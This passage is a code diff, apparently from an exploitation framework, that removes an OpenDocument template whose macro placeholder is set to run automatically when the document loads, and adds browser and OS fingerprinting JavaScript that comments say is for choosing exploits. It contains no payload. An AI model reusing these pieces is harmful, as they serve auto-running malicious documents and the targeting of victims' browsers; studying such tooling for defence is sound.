-<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
-<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">REM  *****  BASIC  *****
-
-CODEGOESHERE
-</script:module>
@@ -1,5 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE library:library PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "library.dtd">
-<library:library xmlns:library="http://openoffice.org/2000/library" library:name="Standard" library:readonly="false" library:passwordprotected="false">
- <library:element library:name="Module1"/>
-</library:library>
@@ -1,5 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE library:libraries PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "libraries.dtd">
-<library:libraries xmlns:library="http://openoffice.org/2000/library" xmlns:xlink="http://www.w3.org/1999/xlink">
- <library:library library:name="Standard" library:link="false"/>
-</library:libraries>
@@ -1,15 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" manifest:version="1.2">
- <manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text" manifest:version="1.2" manifest:full-path="/"/>
- <manifest:file-entry manifest:media-type="" manifest:full-path="Configurations2/accelerator/current.xml"/>
- <manifest:file-entry manifest:media-type="application/vnd.sun.xml.ui.configuration" manifest:full-path="Configurations2/"/>
- <manifest:file-entry manifest:media-type="image/png" manifest:full-path="Thumbnails/thumbnail.png"/>
- <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="content.xml"/>
- <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/Standard/script-lb.xml"/>
- <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/Standard/Module1.xml"/>
- <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/script-lc.xml"/>
- <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="settings.xml"/>
- <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="styles.xml"/>
- <manifest:file-entry manifest:media-type="application/rdf+xml" manifest:full-path="manifest.rdf"/>
- <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="meta.xml"/>
-</manifest:manifest>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:textooo="http://openoffice.org/2013/office" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" office:version="1.2"><office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:Standard.Module1.OnLoad?language=Basic&amp;location=document" xlink:type="simple"/></office:event-listeners></office:scripts><office:font-face-decls><style:font-face style:name="Mangal1" svg:font-family="Mangal"/><style:font-face style:name="Times New Roman" svg:font-family="&apos;Times New Roman&apos;" style:font-family-generic="roman" style:font-pitch="variable"/><style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="swiss" style:font-pitch="variable"/><style:font-face style:name="Mangal" svg:font-family="Mangal" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="Microsoft YaHei" svg:font-family="&apos;Microsoft YaHei&apos;" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="SimSun" svg:font-family="SimSun" style:font-family-generic="system" style:font-pitch="variable"/></office:font-face-decls><office:automatic-styles/><office:body>DOCBODYGOESHER<office:text><text:sequence-decls><text:sequence-decl text:display-outline-level="0" text:name="Illustration"/><text:sequence-decl text:display-outline-level="0" text:name="Table"/><text:sequence-decl text:display-outline-level="0" text:name="Text"/><text:sequence-decl text:display-outline-level="0" text:name="Drawing"/></text:sequence-decls><text:p text:style-name="Standard"/></office:text></office:body></office:document-content>
@@ -1,18 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
-  <rdf:Description rdf:about="styles.xml">
-    <rdf:type rdf:resource="http://docs.oasis-open.org/ns/office/1.2/meta/odf#StylesFile"/>
-  </rdf:Description>
-  <rdf:Description rdf:about="">
-    <ns0:hasPart xmlns:ns0="http://docs.oasis-open.org/ns/office/1.2/meta/pkg#" rdf:resource="styles.xml"/>
-  </rdf:Description>
-  <rdf:Description rdf:about="content.xml">
-    <rdf:type rdf:resource="http://docs.oasis-open.org/ns/office/1.2/meta/odf#ContentFile"/>
-  </rdf:Description>
-  <rdf:Description rdf:about="">
-    <ns0:hasPart xmlns:ns0="http://docs.oasis-open.org/ns/office/1.2/meta/pkg#" rdf:resource="content.xml"/>
-  </rdf:Description>
-  <rdf:Description rdf:about="">
-    <rdf:type rdf:resource="http://docs.oasis-open.org/ns/office/1.2/meta/pkg#Document"/>
-  </rdf:Description>
-</rdf:RDF>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<office:document-meta xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:textooo="http://openoffice.org/2013/office" office:version="1.2"><office:meta><meta:initial-creator>sinn3r </meta:initial-creator><meta:creation-date>2017-02-06T15:15:47.35</meta:creation-date><dc:date>2017-02-06T15:21:59.64</dc:date><dc:creator>sinn3r </dc:creator><meta:editing-duration>PT4M16S</meta:editing-duration><meta:editing-cycles>2</meta:editing-cycles><meta:generator>OpenOffice/4.1.3$Win32 OpenOffice.org_project/413m1$Build-9783</meta:generator><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="0" meta:word-count="0" meta:character-count="0"/></office:meta></office:document-meta>
@@ -1 +0,0 @@
-application/vnd.oasis.opendocument.text
@@ -0,0 +1,89 @@
+var ie_addons_detect = { };
+
+/**
+ * Returns true if this ActiveX is available, otherwise false.
+ * Grabbed this directly from browser_autopwn.rb
+ **/
+ie_addons_detect.hasActiveX = function (axo_name, method) {
+  var axobj = null;
+  if (axo_name.substring(0,1) == String.fromCharCode(123)) {
+    axobj = document.createElement("object");
+    axobj.setAttribute("classid", "clsid:" + axo_name);
+    axobj.setAttribute("id", axo_name);
+    axobj.setAttribute("style", "visibility: hidden");
+    axobj.setAttribute("width", "0px");
+    axobj.setAttribute("height", "0px");
+    document.body.appendChild(axobj);
+    if (typeof(axobj[method]) == 'undefined') {
+      var attributes = 'id="' + axo_name + '"';
+      attributes += ' classid="clsid:' + axo_name + '"';
+      attributes += ' style="visibility: hidden"';
+      attributes += ' width="0px" height="0px"';
+      document.body.innerHTML += "<object " + attributes + "></object>";
+      axobj = document.getElementById(axo_name);
+    }
+  } else {
+    try {
+      axobj = new ActiveXObject(axo_name);
+    } catch(e) {
+      // If we can't build it with an object tag and we can't build it
+      // with ActiveXObject, it can't be built.
+      return false;
+    };
+  }
+  if (typeof(axobj[method]) != 'undefined') {
+    return true;
+  }
+
+  return false;
+};
+
+/**
+ * Returns the version of Microsoft Office. If not found, returns null.
+ **/
+ie_addons_detect.getMsOfficeVersion = function () {
+  var version;
+  var types = new Array();
+  for (var i=1; i <= 5; i++) {
+    try {
+      types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
+    }
+    catch (e) {
+      types[i-1] = null;
+    }
+  }
+
+  if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+      types[3] == 'object' && types[4] == 'object')
+  {
+    version = "2012";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == 'object' && types[4] == null)
+  {
+    version = "2010";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2007";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2003";
+  }
+  else if (types[0] == 'object' && types[1] == null && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    // If run for the first time, you must manullay allow the "Microsoft Office XP"
+    // add-on to run. However, this prompt won't show because the ActiveXObject statement
+    // is wrapped in an exception handler.
+    version = "xp";
+  }
+  else {
+    version = null;
+  }
+
+  return version;
+}
@@ -0,0 +1,157 @@
+var misc_addons_detect = { };
+
+
+/**
+ * Detects whether the browser supports Silverlight or not
+ **/
+misc_addons_detect.hasSilverlight = function () {
+	var found = false;
+
+	//
+	// When on IE, we can use AgControl.AgControl to actually detect the version too.
+	// But this ability is specific to IE, so we fall back to just true/false response
+	//
+	try {
+		var ax = new ActiveXObject('AgControl.AgControl');
+		found = true;
+	} catch(e) {}
+
+	//
+	// ActiveX didn't get anything, try looking in MIMEs
+	//
+	if (!found) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i < mimes.length; i++) {
+			if (/x\-silverlight/.test(mimes[i].type)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	//
+	// MIMEs didn't work either. Try navigator.
+	//
+	if (!found) {
+		var count = navigator.plugins.length;
+		for (var i=0; i < count; i++) {
+			var pluginName = navigator.plugins[i].name;
+			if (/Silverlight Plug\-In/.test(pluginName)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	return found;
+}
+
+/**
+ * Returns the Adobe Flash version
+**/
+misc_addons_detect.getFlashVersion = function () {
+	var foundVersion = null;
+
+	//
+	// Gets the Flash version by using the GetVariable function via ActiveX
+	//
+	try {
+		var ax = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').toString();
+		foundVersion = ax.match(/[\d,]+/g)[0].replace(/,/g, '.')
+	} catch (e) {}
+
+	//
+	// This should work fine for most non-IE browsers
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var pluginDesc = mimes[i].enabledPlugin.description.toString();
+			var m = pluginDesc.match(/Shockwave Flash [\d\.]+/g);
+			if (m != null) {
+				foundVersion = m[0].match(/\d.+/g)[0];
+				break;
+			}
+		}
+	}
+
+	//
+	// Detection for Windows + Firefox
+	//
+	if (foundVersion == null) {
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Shockwave Flash/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
+
+/**
+ * Returns the Java version
+ **/
+misc_addons_detect.getJavaVersion = function () {
+	var foundVersion = null;
+
+	//
+	// This finds the Java version from Java WebStart's ActiveX control
+	// This is specific to Windows
+	//
+	for (var i1=0; i1 < 10; i1++) {
+	for (var i2=0; i2 < 10; i2++) {
+	for (var i3=0; i3 < 10; i3++) {
+	for (var i4=0; i4 < 10; i4++) {
+		var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
+		var progId = "JavaWebStart.isInstalled." + version;
+		try {
+			new ActiveXObject(progId);
+			return version;
+		}
+		catch (e) {
+			continue;
+		}		
+	}}}}
+
+	//
+	// This finds the Java version from window.navigator.mimeTypes
+	// This seems to work pretty well for most browsers except for IE
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var m = /java.+;version=(.+)/.exec(mimes[i].type);
+			if (m) {
+				var version = parseFloat(m[1]);
+				if (version > foundVersion) {
+					foundVersion = version;
+				}
+			}
+		}
+	}
+
+	//
+	// This finds the Java version from navigator plugins
+	// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
+	// So we do this last.
+	//
+	if (foundVersion == null) {
+		var foundJavaString = "";
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Java/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
@@ -0,0 +1,831 @@
+// Case matters, see lib/msf/core/constants.rb
+// All of these should match up with constants in ::Msf::HttpClients
+var clients_opera  = "Opera";
+var clients_ie     = "MSIE";
+var clients_ff     = "Firefox";
+var clients_chrome = "Chrome";
+var clients_safari = "Safari";
+
+// All of these should match up with constants in ::Msf::OperatingSystems
+var oses_linux     = "Linux";
+var oses_android   = "Android";
+var oses_windows   = "Windows";
+var oses_mac_osx   = "Mac OS X";
+var oses_apple_ios = "iOS";
+var oses_freebsd   = "FreeBSD";
+var oses_netbsd    = "NetBSD";
+var oses_openbsd   = "OpenBSD";
+
+// All of these should match up with the ARCH_* constants
+var arch_armle    = "armle";
+var arch_x86      = "x86";
+var arch_x86_64   = "x86_64";
+var arch_ppc      = "ppc";
+var arch_mipsle   = "mipsle";
+
+var os_detect = {};
+
+/**
+ * This can reliably detect browser versions for IE and Firefox even in the
+ * presence of a spoofed User-Agent.  OS detection is more fragile and
+ * requires truthful navigator.appVersion and navigator.userAgent strings in
+ * order to be accurate for more than just IE on Windows.
+ **/
+os_detect.getVersion = function(){
+	//Default values:
+	var os_name;
+	var os_vendor;
+	var os_device;
+	var os_flavor;
+	var os_sp;
+	var os_lang;
+	var ua_name;
+	var ua_version;
+	var arch = "";
+	var useragent = navigator.userAgent;
+	// Trust but verify...
+	var ua_is_lying = false;
+
+	var version = "";
+	var unknown_fingerprint = null;
+
+	var css_is_valid = function(prop, propCamelCase, css) {
+		if (!document.createElement) return false;
+		var d = document.createElement('div');
+		d.setAttribute('style', prop+": "+css+";")
+		return d.style[propCamelCase] === css;
+	}
+
+	var input_type_is_valid = function(input_type) {
+		if (!document.createElement) return false;
+		var input = document.createElement('input');
+		input.setAttribute('type', input_type);
+		return input.type == input_type;
+	}
+
+	//--
+	// Client
+	//--
+	if (window.opera) {
+		ua_name = clients_opera;
+		if (!navigator.userAgent.match(/Opera/)) {
+			ua_is_lying = true;
+		}
+		// This seems to be completely accurate, e.g. "9.21" is the return
+		// value of opera.version() when run on Opera 9.21
+		ua_version = opera.version();
+		if (!os_name) {
+			// The 'inconspicuous' argument is there to give us a real value on
+			// Opera 6 where, without it, the return value is supposedly
+			// 'Hm, were you only as smart as Bjorn Vermo...'
+			// though I have not verfied this claim.
+			switch (opera.buildNumber('inconspicuous')) {
+				case "344":   // opera-9.0-20060616.1-static-qt.i386-en-344
+				case "1347":  // Opera 9.80 / Ubuntu 10.10 (Karmic Koala)
+				case "2091":  // opera-9.52-2091.gcc3-shared-qt3.i386.rpm
+				case "2444":  // opera-9.60.gcc4-shared-qt3.i386.rpm
+				case "2474":  // Opera 9.63 / Debian Testing (Lenny)
+				case "4102":  // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron)
+				case "6386":  // 10.61
+					os_name = oses_linux;
+					break;
+				case "1074":  // Opera 11.50 / Windows XP
+				case "1100":  // Opera 11.52 / Windows XP
+				case "3445":  // 10.61
+				case "3516":  // Opera 10.63 / Windows XP
+				case "7730":  // Opera 8.54 / Windows XP
+				case "8502":  // "Opera 9 Eng Setup.exe"
+				case "8679":  // "Opera_9.10_Eng_Setup.exe"
+				case "8771":  // "Opera_9.20_Eng_Setup.exe"
+				case "8776":  // "Opera_9.21_Eng_Setup.exe"
+				case "8801":  // "Opera_9.22_Eng_Setup.exe"
+				case "10108": // "Opera_952_10108_en.exe"
+				case "10467": // "Opera_962_en_Setup.exe"
+				case "10476": // Opera 9.63 / Windows XP
+				case "WMD-50433": // Windows Mobile - "Mozilla/5.0 (Windows Mobile; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.00"
+					os_name = oses_windows;
+					break;
+				case "2480":  // Opera 9.64 / FreeBSD 7.0
+					os_name = oses_freebsd;
+					break;
+				case "6386":  // 10.61
+					os_name = oses_mac_osx;
+					break;
+				case "1407":
+					// In the case of mini versions, the UA is quite a bit
+					// harder to spoof, so it's correspondingly easier to
+					// trust. Unfortunately, despite being fairly truthful in
+					// what OS it's running on, Opera mini seems to lie like a
+					// rug in regards to the browser version.
+					//
+					// iPhone, iOS 5.0.1
+					//  Opera/9.80 (iPhone; Opera Mini/7.1.32694/27.1407; U; en) Presto/2.8.119 Version/11.10.10
+					// Android 2.3.6, opera mini 7.1
+					//  Opera/9.80 (Android; Opera Mini/7.29530/27.1407; U; en) Presto/2.8.119 Version/11.101.10
+					if (navigator.userAgent.indexOf("Android")) {
+						os_name = oses_android;
+					} else if (navigator.userAgent.indexOf("iPhone")) {
+						os_name = oses_apple_ios;
+						os_device = "iPhone";
+					}
+					break;
+				// A few are ambiguous, record them here
+				case "1250":
+					// Opera 9.80 / Windows XP
+					// Opera 11.61 / Windows XP
+					// Opera 11.61 / Debian 4.0 (Etch)
+					break;
+				default:
+					unknown_fingerprint = opera.buildNumber('inconspicuous');
+					break;
+			}
+		}
+	} else if (typeof window.onmousewheel != 'undefined' && ! (typeof ScriptEngineMajorVersion == 'function') ) { // IE 10 now has onmousewheel
+
+		// Then this is webkit, could be Safari or Chrome.
+		// Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
+		// Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
+		// Mozilla/5.0 (Linux; U; Android 2.2; en-au; GT-I9000 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
+		// Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8C148
+		// Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
+		// Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
+
+		// Google Chrome has window.google (older versions), window.chromium (older versions), and window.window.chrome (3+)
+		if (window.chromium || window.google || window.chrome) {
+			ua_name = clients_chrome;
+			search = "Chrome";
+		} else {
+			ua_name = clients_safari;
+			search = "Version";
+		}
+
+		platform = navigator.platform.toLowerCase();
+		// Just to be a pain, iPod and iPad both leave off "Safari" and
+		// "Version" in the UA, see example above.  Grab the webkit version
+		// instead.  =/
+		if (platform.match(/ipod/)) {
+			os_name = oses_apple_ios;
+			os_device = "iPod";
+			arch = arch_armle;
+			search = "AppleWebKit";
+		} else if (platform.match(/ipad/)) {
+			os_name = oses_apple_ios;
+			os_device = "iPad";
+			arch = arch_armle;
+			search = "AppleWebKit";
+		} else if (platform.match(/iphone/)) {
+			os_name = oses_apple_ios;
+			os_device = "iPhone";
+			arch = arch_armle;
+		} else if (platform.match(/macintel/)) {
+			os_name = oses_mac_osx;
+			arch = arch_x86;
+		} else if (platform.match(/linux/)) {
+			os_name = oses_linux;
+
+			if (platform.match(/x86_64/)) {
+				arch = arch_x86_64;
+			} else if (platform.match(/arm/)) {
+				arch = arch_armle;
+			} else if (platform.match(/x86/)) {
+				arch = arch_x86;
+			} else if (platform.match(/mips/)) {
+				arch = arch_mipsle;
+			}
+
+			// Android overrides Linux
+			if (navigator.userAgent.match(/android/i)) {
+				os_name = oses_android;
+			}
+		} else if (platform.match(/windows/)) {
+			os_name = oses_windows;
+		}
+
+		ua_version = this.searchVersion(search, navigator.userAgent);
+		if (!ua_version || 0 == ua_version.length) {
+			ua_is_lying = true;
+		}
+	} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
+		// Use taintEnabled to identify FF since other recent browsers
+		// implement window.getComputedStyle now.  For some reason, checking for
+		// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
+		// isn't IE first.
+
+		// Also check MozBlobBuilder because FF 9.0.1 does not support taintEnabled
+
+		// Then this is a Gecko derivative, assume Firefox since that's the
+		// only one we have sploits for.  We may need to revisit this in the
+		// future.  This works for multi/browser/mozilla_compareto against
+		// Firefox and Mozilla, so it's probably good enough for now.
+		ua_name = clients_ff;
+		// Thanks to developer.mozilla.org "Firefox for developers" series for most
+		// of these.
+		// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
+		if ('closest' in Element.prototype) {
+			ua_version = '35.0';
+		} else if ('matches' in Element.prototype) {
+			ua_version = '34.0';
+		} else if ('RadioNodeList' in window) {
+			ua_version = '33.0';
+		} else if ('copyWithin' in Array.prototype) {
+			ua_version = '32.0';
+		} else if ('fill' in Array.prototype) {
+			ua_version = '31.0';
+		} else if (css_is_valid('background-blend-mode', 'backgroundBlendMode', 'multiply')) {
+			ua_version = '30.0';
+		} else if (css_is_valid('box-sizing', 'boxSizing', 'border-box')) {
+			ua_version = '29.0';
+		} else if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) {
+			ua_version = '28.0';
+		} else if (css_is_valid('cursor', 'cursor', 'grab')) {
+			ua_version = '27.0';
+		} else if (css_is_valid('image-orientation',
+		                 'imageOrientation',
+		                 '0deg')) {
+			ua_version = '26.0';
+		} else if (css_is_valid('background-attachment',
+		                 'backgroundAttachment',
+		                 'local')) {
+			ua_version = '25.0';
+		} else if ('DeviceStorage' in window && window.DeviceStorage &&
+				'default' in window.DeviceStorage.prototype) {
+			// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
+			ua_version = '24.0';
+		} else if (input_type_is_valid('range')) {
+			ua_version = '23.0';
+		} else if ('HTMLTimeElement' in window) {
+			ua_version = '22.0';
+		} else if ('createElement' in document &&
+		           document.createElement('main') &&
+		           document.createElement('main').constructor === window['HTMLElement']) {
+			ua_version = '21.0';
+		} else if ('imul' in Math) {
+			ua_version = '20.0';
+		} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
+			ua_version = '19.0';
+		} else if ('devicePixelRatio' in window) {
+			ua_version = '18.0';
+		} else if ('createElement' in document &&
+		           document.createElement('iframe') &&
+		           'sandbox' in document.createElement('iframe')) {
+			ua_version = '17.0';
+		} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
+			ua_version = '16.0';
+		} else if ('HTMLSourceElement' in window &&
+		           HTMLSourceElement.prototype &&
+		           'media' in HTMLSourceElement.prototype) {
+			ua_version = '15.0';
+		} else if ('mozRequestPointerLock' in document.body) {
+			ua_version = '14.0';
+		} else if ('Map' in window) {
+			ua_version = "13.0";
+		} else if ('mozConnection' in navigator) {
+			ua_version = "12.0";
+		} else if ('mozVibrate' in navigator) {
+			ua_version = "11.0";
+		} else if (css_is_valid('-moz-backface-visibility', 'MozBackfaceVisibility', 'hidden')) {
+			ua_version = "10.0";
+		} else if ('doNotTrack' in navigator) {
+			ua_version = "9.0";
+		} else if ('insertAdjacentHTML' in document.body) {
+			ua_version = "8.0";
+		} else if ('ondeviceorientation' in window && !('createEntityReference' in document)) {
+			ua_version = "7.0";
+		} else if ('MozBlobBuilder' in window) {
+			ua_version = "6.0";
+		} else if ('isGenerator' in Function) {
+			ua_version = "5.0";
+		} else if ('isArray' in Array) {
+			ua_version = "4.0";
+		} else if (document.readyState) {
+			ua_version = "3.6";
+		} else if (String.trimRight) {
+			ua_version = "3.5";
+		} else if (document.getElementsByClassName) {
+			ua_version = "3";
+		} else if (window.Iterator) {
+			ua_version = "2";
+		} else if (Array.every) {
+			ua_version = "1.5";
+		} else {
+			ua_version = "1";
+		}
+		if (navigator.oscpu != navigator.platform) {
+			ua_is_lying = true;
+		}
+		// oscpu is unaffected by changes in the useragent and has values like:
+		//    "Linux i686"
+		//    "Windows NT 6.0"
+		// haven't tested on 64-bit Windows
+		version = navigator.oscpu;
+		if (version.match(/i.86/)) {
+			arch = arch_x86;
+		}
+		if (version.match(/x86_64/)) {
+			arch = arch_x86_64;
+		}
+		if (version.match(/Windows/)) {
+			os_name = oses_windows;
+			// Technically these will mismatch server OS editions, but those are
+			// rarely used as client systems and typically have the same exploit
+			// characteristics as the associated client.
+			switch(version) {
+				case "Windows NT 5.0": os_name = "Windows 2000"; break;
+				case "Windows NT 5.1": os_name = "Windows XP"; break;
+				case "Windows NT 5.2": os_name = "Windows 2003"; break;
+				case "Windows NT 6.0": os_name = "Windows Vista"; break;
+				case "Windows NT 6.1": os_name = "Windows 7"; break;
+				case "Windows NT 6.2": os_name = "Windows 8"; break;
+				case "Windows NT 6.3": os_name = "Windows 8.1"; break;
+			}
+		}
+		if (version.match(/Linux/)) {
+			os_name = oses_linux;
+		}
+		// end navigator.oscpu checks
+  } else if (typeof ScriptEngineMajorVersion == "function") {
+		// Then this is IE and we can very reliably detect the OS.
+		// Need to add detection for IE on Mac.  Low priority, since we
+		// don't have any sploits for it yet and it's a very low market
+		// share.
+		os_name = oses_windows;
+		ua_name = clients_ie;
+		version_maj   = ScriptEngineMajorVersion().toString();
+		version_min   = ScriptEngineMinorVersion().toString();
+		version_build = ScriptEngineBuildVersion().toString();
+
+		version = version_maj + version_min + version_build;
+
+		//document.write("ScriptEngine: "+version+"<br />");
+		switch (version){
+			case "514615":
+				// IE 5.00.2920.0000, 2000 Advanced Server SP0 English
+				ua_version = "5.0";
+				os_name = "Windows 2000";
+				os_sp = "SP0";
+				break;
+			case "515907":
+				os_name = "Windows 2000";
+				os_sp = "SP3";	//or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109
+				break;
+			case "518513":
+				os_name = "Windows 2000";
+				os_sp = "SP4";
+				break;
+			case "566626":
+				// IE 6.0.2600.0000, XP SP0 English
+				// IE 6.0.2800.1106, XP SP1 English
+				ua_version = "6.0";
+				os_name = "Windows XP";
+				os_sp = "SP0";
+				break;
+			case "568515":
+				// IE 6.0.3790.0, 2003 Standard SP0 English
+				ua_version = "6.0";
+				os_name = "Windows 2003";
+				os_sp = "SP0";
+				break;
+			case "568820":
+				// IE 6.0.2900.2180, xp sp2 english
+				os_name = "Windows XP";
+				os_sp = "SP2";
+				break;
+			case "568827":
+				os_name = "Windows 2003";
+				os_sp = "SP1";
+				break;
+			case "568831":	//XP SP2 -OR- 2K SP4
+				if (os_name == "2000"){
+					os_sp = "SP4";
+				}
+				else{
+					os_name = "Windows XP";
+					os_sp = "SP2";
+				}
+				break;
+			case "568832":
+				os_name = "Windows 2003";
+				os_sp = "SP2";
+				break;
+			case "568837":
+				// IE 6.0.2900.2180, XP Professional SP2 Korean
+				ua_version = "6.0";
+				os_name = "Windows XP";
+				os_sp = "SP2";
+				break;
+			case "5716599":
+				// IE 7.0.5730.13, XP Professional SP3 English
+				// IE 6.0.2900.5512, XP Professional SP3 English
+				// IE 6.0.2900.5512, XP Professional SP3 Spanish
+				//
+				// Since this scriptengine applies to more than one major version of
+				// IE, rely on the object detection below to determine ua_version.
+				//ua_version = "6.0";
+				os_name = "Windows XP";
+				os_sp = "SP3";
+				break;
+			case "575730":
+				// IE 7.0.5730.13, Server 2003 Standard SP2 English
+				// IE 7.0.5730.13, Server 2003 Standard SP1 English
+				// IE 7.0.5730.13, XP Professional SP2 English
+				// Rely on the user agent matching above to determine the OS.
+				// This will incorrectly identify 2k3 SP1 as SP2
+				ua_version = "7.0";
+				os_sp = "SP2";
+				break;
+			case "5718066":
+				// IE 7.0.5730.13, XP Professional SP3 English
+				ua_version = "7.0";
+				os_name = "Windows XP";
+				os_sp = "SP3";
+				break;
+			case "5722589":
+				// IE 7.0.5730.13, XP Professional SP3 English
+				ua_version = "7.0";
+				os_name = "Windows XP";
+				os_sp = "SP3";
+				break;
+			case "576000":
+				// IE 7.0.6000.16386, Vista Ultimate SP0 English
+				ua_version = "7.0";
+				os_name = "Windows Vista";
+				os_sp = "SP0";
+				break;
+			case "580":
